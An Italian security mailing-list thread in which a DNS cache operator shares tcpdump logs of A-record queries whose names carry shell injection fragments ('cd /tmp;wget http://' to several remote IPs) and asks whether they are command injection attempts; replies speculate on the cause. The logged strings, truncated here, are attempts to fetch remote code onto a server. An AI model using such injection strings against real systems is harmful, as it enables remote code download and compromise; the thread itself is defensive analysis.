No, sono tutti di utenti diversi. Il giorno 14 febbraio 2017 23:22, Claudio Telmon <[email protected]> ha scritto:
> On 02/14/2017 03:25 PM, Lorenzo Mainardi wrote: > > Buonasera a tutti, > > gestisco un server DNS cache per diverse migliaia di utenti broadband e > mi > > ritrovo nei log delle query di questo tipo: > > > > 15:11:14.531518 IP x.y.z.k.wifree > my.dns.cache.only.domain: 9169+ A? > `cd > > /tmp;wget http://105.226.91.155. (53) > > 15:11:14.549417 IP x.y.z.k.wifree > my.dns.cache.only.domain: 9170+ A? > `cd > > /tmp;wget http://105.226.91.155. (53) > > 15:11:14.567374 IP x.y.z.k.wifree > my.dns.cache.only.domain: 9171+ A? > `cd > > /tmp;wget http://105.226.91.155. (53) > > 15:11:17.792996 IP e.f.g.h.11783 > my.dns.cache.only.domain: 212+ A? `cd > > /tmp;wget http://36.107.97.237:. (53) > > 15:11:18.313564 IP a.b.c.e.11080 > my.dns.cache.only.domain: 1069+ A? `cd > > /tmp;wget http://84.9.195.97:27. (53) > > 15:11:26.300024 IP a.b.c.d.15489 > my.dns.cache.only.domain: 1299+ A? `cd > > /tmp;wget http://2.186.193.103:. (53) > > 15:11:26.318653 IP a.b.c.d.15489 > my.dns.cache.only.domain: 1300+ A? `cd > > /tmp;wget http://2.186.193.103:. (53) > > 15:11:26.337361 IP a.b.c.d.15489 > my.dns.cache.only.domain: 1301+ A? `cd > > /tmp;wget http://2.186.193.103:. (53) > > > > Che cosa pensate possano essere? Tentativi di command injection? > > è la prima volta che mi capita di vedere delle query del genere. > > > > Uno script scritto male? Qualcuno sta provando a usare dei log per > estrarre un IP e fare una query del record A, ed ha sbagliato il parsing > della stringa? ;) Se è così, ti verrebbero tutte dallo stesso soggetto, > gli IP possono essere IP magari dinamici associati allo stesso utente? > > -- > > Claudio Telmon > [email protected] > http://www.telmon.org > ________________________________________________________ > http://www.sikurezza.org - Italian Security Mailing List > > -- LORENZO MAINARDI http://blog.mainardi.me
